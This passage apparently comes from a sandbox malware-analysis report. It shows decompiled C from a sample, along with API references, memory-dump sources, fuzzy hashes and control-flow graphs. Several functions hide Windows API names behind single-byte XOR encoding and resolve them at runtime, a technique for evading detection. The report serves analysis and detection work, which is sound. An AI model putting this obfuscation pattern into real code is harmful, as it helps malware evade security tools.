                                                                    					_v10 = 1;
                                                                    					_v9 = 4;
                                                                    					_v8 = 0x26;
                                                                    					_v7 = 9;
                                                                    					_v6 = 0xc;
                                                                    					_v4 = 0x60;
                                                                    					_t19 = 0;
                                                                    					do {
                                                                    						 *(_t27 + _t19) =  *(_t27 + _t19) ^ 0x00000060;
                                                                    						_t19 = _t19 + 1;
                                                                    					} while (_t19 < 9);
                                                                    					 *0x447e54 = E0041A600(_t27);
                                                                    				}
                                                                    				_t17 = ReadFile(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t17;
                                                                    			}














                                                                    0x0041b3fa
                                                                    0x0041b3fe
                                                                    0x0041b402
                                                                    0x0041b406
                                                                    0x0041b40a
                                                                    0x0041b40f
                                                                    0x0041b414
                                                                    0x0041b419
                                                                    0x0041b41e
                                                                    0x0041b423
                                                                    0x0041b428
                                                                    0x0041b430
                                                                    0x0041b430
                                                                    0x0041b434
                                                                    0x0041b435
                                                                    0x0041b446
                                                                    0x0041b446
                                                                    0x0041b464
                                                                    0x0041b469

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0041B464
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: &$`
                                                                    • API String ID: 2738559852-2145084350
                                                                    • Opcode ID: bdc96b1ec9894d49157d80569ca01b516950cee4dbdfb481f2c0e3db89f4cff6
                                                                    • Instruction ID: b893af8124a6af6723b5d8156e945cbc3e6634095fd3d5a9478a756de87d527b
                                                                    • Opcode Fuzzy Hash: bdc96b1ec9894d49157d80569ca01b516950cee4dbdfb481f2c0e3db89f4cff6
                                                                    • Instruction Fuzzy Hash: 7B015A7100C3C09ED305DBA8D548B4BBBE5ABEA308F08C9ADE4D887242D779D909C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 116 41ad50-41ad5a 117 41adab-41adbf RtlFreeHeap 116->117 118 41ad5c-41ad89 116->118 119 41ad90-41ad98 118->119 119->119 120 41ad9a-41ada6 call 41a600 119->120 120->117
                                                                    C-Code - Quality: 100%
                                                                    			E0041AD50(void* _a4, long _a8, void* _a12) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _t15;
                                                                    				void* _t17;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				if( *0x447df8 == 0) {
                                                                    					_v11 = 0xc;
                                                                    					_v6 = 0xc;
                                                                    					_v5 = 0xc;
                                                                    					 *_t23 = 0x21;
                                                                    					_v10 = 8;
                                                                    					_v9 = 0x19;
                                                                    					_v8 = 0x2f;
                                                                    					_v7 = 0x1b;
                                                                    					_v4 = 0x69;
                                                                    					_t17 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t17) =  *(_t23 + _t17) ^ 0x00000069;
                                                                    						_t17 = _t17 + 1;
                                                                    					} while (_t17 < 9);
                                                                    					 *0x447df8 = E0041A600(_t23);
                                                                    				}
                                                                    				_t15 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                                    				return _t15;
                                                                    			}














                                                                    0x0041ad5a
                                                                    0x0041ad5e
                                                                    0x0041ad62
                                                                    0x0041ad66
                                                                    0x0041ad6a
                                                                    0x0041ad6e
                                                                    0x0041ad73
                                                                    0x0041ad78
                                                                    0x0041ad7d
                                                                    0x0041ad82
                                                                    0x0041ad87
                                                                    0x0041ad90
                                                                    0x0041ad90
                                                                    0x0041ad94
                                                                    0x0041ad95
                                                                    0x0041ada6
                                                                    0x0041ada6
                                                                    0x0041adba
                                                                    0x0041adbf

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(?,?,?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041ADBA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: /$i
                                                                    • API String ID: 3298025750-165077141
                                                                    • Opcode ID: 037d464677c18427fb23a018a43f7fe41e788ca8b19b5b3bda548f3a828354cd
                                                                    • Instruction ID: 5f8f36b2009e2029b5f36b40d95dfb93659a5cc51bc1b85cb30016ec5b9d2c72
                                                                    • Opcode Fuzzy Hash: 037d464677c18427fb23a018a43f7fe41e788ca8b19b5b3bda548f3a828354cd
                                                                    • Instruction Fuzzy Hash: 0F014B7151C3819ED302DB68A448B9BBFE55FE6304F04C86DE4D987242D279C559C323
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 123 427472-42748a call 42422c 126 42748c 123->126 127 42748d-427495 123->127 126->127 128 427497-42749e 127->128 129 4274fc-4274fe 127->129 132 4274a0-4274b2 128->132 133 4274e7-4274e9 128->133 130 427500-427506 129->130 131 427525 129->131 130->131 135 427508-427511 call 422efd 130->135 137 427527-42752c call 424267 131->137 132->133 136 4274b4-4274d7 call 4241fb call 424eed call 42751c 132->136 133->131 134 4274eb-4274fa RtlAllocateHeap 133->134 134->129 135->127 144 427517 135->144 136->134 149 4274d9-4274e4 call 4282f0 136->149 144->137 149->133
                                                                    C-Code - Quality: 76%
                                                                    			E00427472(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t17;
                                                                    				long _t23;
                                                                    				long _t31;
                                                                    				void* _t33;
                                                                    				void* _t34;
                                                                    
                                                                    				_push(0x10);
                                                                    				_push(0x430b60);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
                                                                    				 *(_t33 - 0x20) = _t31;
                                                                    				if(_t31 == 0) {
                                                                    					_t31 = _t31 + 1;
                                                                    				}
                                                                    				do {
                                                                    					_t28 = 0;
                                                                    					 *(_t33 - 0x1c) = 0;
                                                                    					if(_t31 > 0xffffffe0) {
                                                                    						L9:
                                                                    						if(_t28 != 0 ||  *0x4483cc == _t28) {
                                                                    							L13:
                                                                    							_t15 = _t28;
                                                                    							L14:
                                                                    							return E00424267(_t15);
                                                                    						} else {
                                                                    							goto L11;
                                                                    						}
                                                                    					}
                                                                    					if( *0x44c298 != 3) {
                                                                    						L7:
                                                                    						if(_t28 != 0) {
                                                                    							goto L13;
                                                                    						}
                                                                    						L8:
                                                                    						_t17 = RtlAllocateHeap( *0x44c294, 8, _t31); // executed
                                                                    						_t28 = _t17;
                                                                    						goto L9;
                                                                    					}
                                                                    					_t31 = _t31 + 0x0000000f & 0xfffffff0;
                                                                    					 *(_t33 + 0xc) = _t31;
                                                                    					_t23 =  *(_t33 - 0x20);
                                                                    					if(_t23 >  *0x44c284) {
                                                                    						goto L7;
                                                                    					}
                                                                    					E004241FB(_t23, 0, 4);
                                                                    					 *(_t33 - 4) =  *(_t33 - 4) & 0;
                                                                    					_push(_t23);
                                                                    					 *(_t33 - 0x1c) = E00424EED();
                                                                    					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                    					E0042751C();
                                                                    					_t28 =  *(_t33 - 0x1c);
                                                                    					if(_t28 == 0) {
                                                                    						goto L8;
                                                                    					}
                                                                    					E004282F0(_t28, 0,  *(_t33 - 0x20));
                                                                    					_t34 = _t34 + 0xc;
                                                                    					goto L7;
                                                                    					L11:
                                                                    				} while (E00422EFD(_t31) != 0);
                                                                    				goto L14;
                                                                    			}








                                                                    0x00427472
                                                                    0x00427474
                                                                    0x00427479
                                                                    0x00427481
                                                                    0x00427485
                                                                    0x0042748a
                                                                    0x0042748c
                                                                    0x0042748c
                                                                    0x0042748d
                                                                    0x0042748d
                                                                    0x0042748f
                                                                    0x00427495
                                                                    0x004274fc
                                                                    0x004274fe
                                                                    0x00427525
                                                                    0x00427525
                                                                    0x00427527
                                                                    0x0042752c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274fe
                                                                    0x0042749e
                                                                    0x004274e7
                                                                    0x004274e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274eb
                                                                    0x004274f4
                                                                    0x004274fa
                                                                    0x00000000
                                                                    0x004274fa
                                                                    0x004274a3
                                                                    0x004274a6
                                                                    0x004274a9
                                                                    0x004274b2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274b6
                                                                    0x004274bc
                                                                    0x004274bf
                                                                    0x004274c6
                                                                    0x004274c9
                                                                    0x004274cd
                                                                    0x004274d2
                                                                    0x004274d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274df
                                                                    0x004274e4
                                                                    0x00000000
                                                                    0x00427508
                                                                    0x0042750f
                                                                    0x00000000

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 004274B6
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00430B60), ref: 004274F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap__lock
                                                                    • String ID:
                                                                    • API String ID: 4078605025-0
                                                                    • Opcode ID: eb7a23d73b4623bc048779519e5e7c47198e42fb99771f0d9f8c586f3dc41243
                                                                    • Instruction ID: bfae256081f821e7f8ac716b83104b51698f36759015f55dcba3785e7d1a2aa1
                                                                    • Opcode Fuzzy Hash: eb7a23d73b4623bc048779519e5e7c47198e42fb99771f0d9f8c586f3dc41243
                                                                    • Instruction Fuzzy Hash: 33112632E01635A7CB21ABA2BC01A6FBB30FB94734F55021BFD2027290CB7C49418E5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 152 422e44-422e5a call 42422c 155 422e8a-422e8c 152->155 156 422e5c-422e62 152->156 158 422e8e 155->158 159 422e8f-422e96 155->159 156->155 157 422e64-422e88 call 4241fb call 424eed call 422eb6 156->157 157->155 163 422ead-422eb2 call 424267 157->163 158->159 161 422e98-422e9b 159->161 162 422e9e-422ea7 RtlAllocateHeap 159->162 161->162 162->163
                                                                    C-Code - Quality: 61%
                                                                    			E00422E44(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				long _t19;
                                                                    				void* _t21;
                                                                    
                                                                    				_push(0xc);
                                                                    				_push(0x4303b8);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t19 =  *(_t21 + 8);
                                                                    				if( *0x44c298 != 3 || _t19 >  *0x44c284) {
                                                                    					L3:
                                                                    					if(_t19 == 0) {
                                                                    						_t19 = _t19 + 1;
                                                                    					}
                                                                    					if( *0x44c298 != 1) {
                                                                    						_t19 = _t19 + 0x0000000f & 0xfffffff0;
                                                                    					}
                                                                    					_t9 = RtlAllocateHeap( *0x44c294, 0, _t19); // executed
                                                                    				} else {
                                                                    					E004241FB(__ebx, __edi, 4);
                                                                    					 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                                                                    					_push(_t19);
                                                                    					 *(_t21 - 0x1c) = E00424EED();
                                                                    					 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
                                                                    					E00422EB6();
                                                                    					_t9 =  *(_t21 - 0x1c);
                                                                    					if( *(_t21 - 0x1c) == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				return E00424267(_t9);
                                                                    			}





                                                                    0x00422e44
                                                                    0x00422e46
                                                                    0x00422e4b
                                                                    0x00422e50
                                                                    0x00422e5a
                                                                    0x00422e8a
                                                                    0x00422e8c
                                                                    0x00422e8e
                                                                    0x00422e8e
                                                                    0x00422e96
                                                                    0x00422e9b
                                                                    0x00422e9b
                                                                    0x00422ea7
                                                                    0x00422e64
                                                                    0x00422e66
                                                                    0x00422e6c
                                                                    0x00422e70
                                                                    0x00422e77
                                                                    0x00422e7a
                                                                    0x00422e7e
                                                                    0x00422e83
                                                                    0x00422e88
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00422e88
                                                                    0x00422eb2

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00422E66
                                                                      • Part of subcall function 004241FB: RtlEnterCriticalSection.NTDLL(?), ref: 00424223
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,004303B8), ref: 00422EA7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCriticalEnterHeapSection__lock
                                                                    • String ID:
                                                                    • API String ID: 409319249-0
                                                                    • Opcode ID: d0ce957e2be77e38cae3fc83edb2ac22db0ae2b8066c8757e3c87c058d83d5e9
                                                                    • Instruction ID: f1610b00c834a9b604e71391abbfedb6f67567200d935a0d8c753689d7ae62f0
                                                                    • Opcode Fuzzy Hash: d0ce957e2be77e38cae3fc83edb2ac22db0ae2b8066c8757e3c87c058d83d5e9
                                                                    • Instruction Fuzzy Hash: F4F0C831F01632E7D750ABB1BE0675E7720FB01324F9A026AF854262E0CBFC0941DA5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E00424675(intOrPtr _a4) {
                                                                    				void* _t6;
                                                                    				intOrPtr _t8;
                                                                    
                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                    				 *0x44c294 = _t6;
                                                                    				if(_t6 == 0) {
                                                                    					L4:
                                                                    					return 0;
                                                                    				} else {
                                                                    					_t8 = E0042465B();
                                                                    					 *0x44c298 = _t8;
                                                                    					if(_t8 != 3) {
                                                                    						L5:
                                                                    						return 1;
                                                                    					} else {
                                                                    						_push(0x3f8);
                                                                    						if(E004246C6() != 0) {
                                                                    							goto L5;
                                                                    						} else {
                                                                    							HeapDestroy( *0x44c294);
                                                                    							goto L4;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}





                                                                    0x00424686
                                                                    0x0042468e
                                                                    0x00424693
                                                                    0x004246bf
                                                                    0x004246c1
                                                                    0x00424695
                                                                    0x00424695
                                                                    0x0042469d
                                                                    0x004246a2
                                                                    0x004246c2
                                                                    0x004246c5
                                                                    0x004246a4
                                                                    0x004246a4
                                                                    0x004246b1
                                                                    0x00000000
                                                                    0x004246b3
                                                                    0x004246b9
                                                                    0x00000000
                                                                    0x004246b9
                                                                    0x004246b1
                                                                    0x004246a2

                                                                    APIs
                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00422D3D,00000001,?,004303A8,00000060), ref: 00424686
                                                                      • Part of subcall function 004246C6: RtlAllocateHeap.NTDLL(00000000,00000140,004246AE), ref: 004246D3
                                                                    • HeapDestroy.KERNEL32(?,004303A8,00000060), ref: 004246B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocateCreateDestroy
                                                                    • String ID:
                                                                    • API String ID: 316229882-0
                                                                    • Opcode ID: d2e44583d249fa54670c712290d6965761ca32f5e078bc4e3fc2beba0b6d3f53
                                                                    • Instruction ID: d98aaec34373d430263f92147fa14a5c7520aeb18d8516735b84bd06c5509dab
                                                                    • Opcode Fuzzy Hash: d2e44583d249fa54670c712290d6965761ca32f5e078bc4e3fc2beba0b6d3f53
                                                                    • Instruction Fuzzy Hash: 14E04874F513115EEB545B70BD4A71636D4EB86B45F444576F509C51B0EBBC8840990C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C090(void* _a4, long _a8, LONG* _a12, long _a16) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				long _t22;
                                                                    				void* _t24;
                                                                    				CHAR* _t33;
                                                                    
                                                                    				if( *0x447eb8 == 0) {
                                                                    					_v15 = 0x88;
                                                                    					_v10 = 0x88;
                                                                    					_v4 = 0x88;
                                                                    					 *_t33 = 0xbe;
                                                                    					_v14 = 0x99;
                                                                    					_v13 = 0xab;
                                                                    					_v12 = 0x84;
                                                                    					_v11 = 0x81;
                                                                    					_v9 = 0xbd;
                                                                    					_v8 = 0x82;
                                                                    					_v7 = 0x84;
                                                                    					_v6 = 0x83;
                                                                    					_v5 = 0x99;
                                                                    					_v3 = 0x9f;
                                                                    					_v2 = 0xed;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t33 + _t24) =  *(_t33 + _t24) ^ 0x000000ed;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xf);
                                                                    					 *0x447eb8 = E0041A600(_t33);
                                                                    				}
                                                                    				_t22 = SetFilePointer(_a4, _a8, _a12, _a16); // executed
                                                                    				return _t22;
                                                                    			}




















                                                                    0x0041c09a
                                                                    0x0041c0a2
                                                                    0x0041c0a6
                                                                    0x0041c0aa
                                                                    0x0041c0ae
                                                                    0x0041c0b2
                                                                    0x0041c0b6
                                                                    0x0041c0bb
                                                                    0x0041c0bf
                                                                    0x0041c0c4
                                                                    0x0041c0c9
                                                                    0x0041c0ce
                                                                    0x0041c0d2
                                                                    0x0041c0d7
                                                                    0x0041c0db
                                                                    0x0041c0e0
                                                                    0x0041c0e5
                                                                    0x0041c0e7
                                                                    0x0041c0e7
                                                                    0x0041c0eb
                                                                    0x0041c0ec
                                                                    0x0041c0fd
                                                                    0x0041c0fd
                                                                    0x0041c116
                                                                    0x0041c11b

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,00000000,?,00000104,?), ref: 0041C116
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d09d72c0fe97900f497ffc031c45929d41649a75de740c762639a865563cd3b0
                                                                    • Instruction ID: 05be4228a32d6350187c95ccadfccda271afa3a1005272b1ef42bb1b614fd13a
                                                                    • Opcode Fuzzy Hash: d09d72c0fe97900f497ffc031c45929d41649a75de740c762639a865563cd3b0
                                                                    • Instruction Fuzzy Hash: 4C11B36210C7C2AEC312DB7C888444BBF9559A6224F58CB9DF0F9872E2D2748546D767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C690(void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				long _t22;
                                                                    				void* _t24;
                                                                    				CHAR* _t32;
                                                                    
                                                                    				if( *0x447efc == 0) {
                                                                    					_v15 = 0xf6;
                                                                    					_v11 = 0xf6;
                                                                    					_v8 = 0xf6;
                                                                    					 *_t32 = 0xc1;
                                                                    					_v14 = 0xf4;
                                                                    					_v13 = 0xdc;
                                                                    					_v12 = 0xe3;
                                                                    					_v10 = 0xfd;
                                                                    					_v9 = 0xd8;
                                                                    					_v7 = 0xea;
                                                                    					_v6 = 0xd6;
                                                                    					_v5 = 0xeb;
                                                                    					_v4 = 0xd2;
                                                                    					_v3 = 0x93;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t32 + _t24) =  *(_t32 + _t24) ^ 0x00000093;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xe);
                                                                    					 *0x447efc = E0041C580(_t32);
                                                                    				}
                                                                    				_t22 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20); // executed
                                                                    				return _t22;
                                                                    			}



















                                                                    0x0041c69a
                                                                    0x0041c69e
                                                                    0x0041c6a2
                                                                    0x0041c6a6
                                                                    0x0041c6aa
                                                                    0x0041c6ae
                                                                    0x0041c6b3
                                                                    0x0041c6b8
                                                                    0x0041c6bd
                                                                    0x0041c6c2
                                                                    0x0041c6c7
                                                                    0x0041c6cc
                                                                    0x0041c6d1
                                                                    0x0041c6d6
                                                                    0x0041c6db
                                                                    0x0041c6e0
                                                                    0x0041c6e2
                                                                    0x0041c6e2
                                                                    0x0041c6e6
                                                                    0x0041c6e7
                                                                    0x0041c6f8
                                                                    0x0041c6f8
                                                                    0x0041c716
                                                                    0x0041c71b

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,00000000,00447B68,?,00000001), ref: 0041C716
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: 6fd00bfad990c8c8a579b9d4fff664709d32074f0ed0b92c335179756fb5eedd
                                                                    • Instruction ID: 26c7d7a95667f7ba8f436c89eb1e81bf1351e27a682cbb78cc27659482a41c2b
                                                                    • Opcode Fuzzy Hash: 6fd00bfad990c8c8a579b9d4fff664709d32074f0ed0b92c335179756fb5eedd
                                                                    • Instruction Fuzzy Hash: CD11F26110C7C2AEC321DB7D884485FBFD56AE6224F18CB9DF0F9962E2E224C506C767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D130(void* _a4, char* _a8, int _a12) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t19;
                                                                    				void* _t21;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				if( *0x447f54 == 0) {
                                                                    					_v14 = 0xbe;
                                                                    					_v11 = 0xbe;
                                                                    					_v6 = 0xbe;
                                                                    					 *_t27 = 0x94;
                                                                    					_v15 = 0xab;
                                                                    					_v13 = 0xb5;
